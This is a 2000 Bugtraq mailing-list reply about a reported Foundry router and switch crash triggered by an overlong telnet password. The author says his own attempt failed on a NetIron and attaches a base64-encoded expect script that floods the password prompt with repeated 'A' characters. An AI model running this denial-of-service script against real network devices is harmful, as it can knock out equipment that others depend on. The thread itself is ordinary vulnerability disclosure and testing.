[17618] in bugtraq
Re: Foundry DoS at login prompt
daemon@ATHENA.MIT.EDU (//Stany)
Mon Nov 13 01:05:18 2000
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-559023410-126398554-974064979=:27879"
Message-Id: <Pine.SO4.4.02.10011121541080.27879-200000@Llewella.NotBSD.org>
Date: Sun, 12 Nov 2000 16:36:19 -0500
Reply-To: //Stany <stany@NOTBSD.ORG>
From: //Stany <stany@NOTBSD.ORG>
X-To: lists@DIE.NET
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <Pine.LNX.4.21.0011112325210.846-100000@asherah.die.net>
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---559023410-126398554-974064979=:27879
Content-Type: TEXT/PLAIN; charset=US-ASCII
On Sat, 11 Nov 2000 lists@DIE.NET wrote:
> In the release notes for Foundry code v07.1.09, I noticed the statement:
>
> If you entered a very long string when prompted for a Telnet
> password, then pressed Enter before the software timed out the
> access attempt, the device reset.
>
> This functions exactly as it describes on FastIrons, BigIrons, and
> ServerIrons I have access to running various versions of firmware.
> If you can get to a login prompt, you can reload the device.
At the moment the only foundry device we have in production is ,
which is a NetIron.
telnet@netiron.magma.ottawa#sh ver
SW: Version 06.5.10T13 Copyright (c) 1996-1999 Foundry Networks, Inc.
Compiled on Jan 8 2000 at 02:24:28 labeled as N8R06510
HW: NetIron Gigabit Switching Router, serial number 04b024
200 MHz Power PC processor 603 (revision 7) with 32756K bytes of DRAM
16 100BaseT interfaces with Level 1 Transceiver LXT975
In other words we are rather behind.
I have spent the last half an hour feeding thousands and thousands of As
to the "Please Enter Password:" prompt, but got nowhere.
I am attaching the script I used for checking. I tried upto 66000
instances of "A" sent down the line.
Perhapse I am doing something wrong (more then likely my script is buggy),
so please, if someone has more detailes, especially detailes that would
convince my management that NetIrons are vulnerable and that we really
should renew a support contract with Foundry Networks, please holler.
> This does not appear to affect ssh logins, which recent versions of the
> Foundry firmware support.
>
> If you have any Foundry gear with externally visible IPs, make sure you
> disable telnet or upgrade your firmware to the latest. This is particularly
> true if you use their load-balancer product, the ServerIron, which
> also supposedly functions to keep your site highly available.
When I actually make it to work on Monday, I'll be sure to check with a
ServerIron and a FastIron Workgroup that are sitting on my desk.
> -- Aaron
Signed:
//Stany
--
+-------+ Stanislav N Vardomskiy - Procurator Odiosus Ex Infernis[TM] +-------+
| "Backups we have; it's restores that we find tricky." Richard Letts at ASR |
| This message is powered by JOLT! For all the sugar and twice the caffeine. |
+--------+ My words are my own. LARTs are provided free of charge. +---------+
---559023410-126398554-974064979=:27879
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="crashfoundry.exp"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.SO4.4.02.10011121636190.27879@Llewella.NotBSD.org>
Content-Description:
Content-Disposition: attachment; filename="crashfoundry.exp"
IyEvdXNyL2xvY2FsL2Jpbi9leHBlY3QNCiMkSWQ6IGNyYXNoZm91bmRyeS5l
eHAsdiAxLjMgMjAwMC8xMS8xMiAyMToyNDo1NyBzdGFueSBFeHAgc3Rhbnkg
JA0KIw0KIyBDb3B5cmlnaHQgMjAwMCwgYnkgU3RhbmlzbGF2IE4uIFZhcmRv
bXNraXksIGh0dHA6Ly93d3cubm90YnNkLm9yZy8NCiMgU2VlIGZpbGUgUkVB
RE1FIGZvciBtb3JlIGluZm8uDQojIFJlbGVhc2VkIHVuZGVyIHRoZSBCU0Qg
bGljZW5zZS4NCiMgVGhlIGFib3ZlIGlzIGEgZ2VuZXJpYyBjb3B5cmlnaHQg
SSBzdGljayBvbiBldmVyeXRoaW5nIEkgd3JpdGUuDQojDQojIFRocmVlIGFy
Z3VtZW50czogSVAgb2YgdGhlIHN5c3RlbSB0byB3aGljaCB0byBjb25uZWN0
LCB1c2VybmFtZSwgYW5kIG51bWJlciBvZiB0aW1lcyB0byBzZW5kLg0KIyBB
YnNvbHV0ZWx5IG5vIGVycm9yIGNoZWNraW5nIGlzIGRvbmUuICBZZXMsIEkg
a25vdy4gIA0KDQoNCnNwYXduIHRlbG5ldCBbbHJhbmdlICRhcmd2IDAgMF0N
CmV4cGVjdCAiTG9naW4gTmFtZSAgOiINCglzbGVlcCAzDQoJc2VuZCAiW2xy
YW5nZSAkYXJndiAxIDFdXHIiDQpleHBlY3QgIlBsZWFzZSBFbnRlciBQYXNz
d29yZCINCglzbGVlcCAxDQoJc2V0IG1heG51bSBbbHJhbmdlICRhcmd2IDIg
Ml0NCglzZXQgdHJpZXMgMA0KCXdoaWxlIHskdHJpZXMgPD0gJG1heG51bX0g
ew0KCQlpbmNyIHRyaWVzDQoJCXNlbmQgIkFBQUFBQUFBQUEiDQoJCX0NCglz
ZW5kICJcciINCmludGVyYWN0DQo=
---559023410-126398554-974064979=:27879--
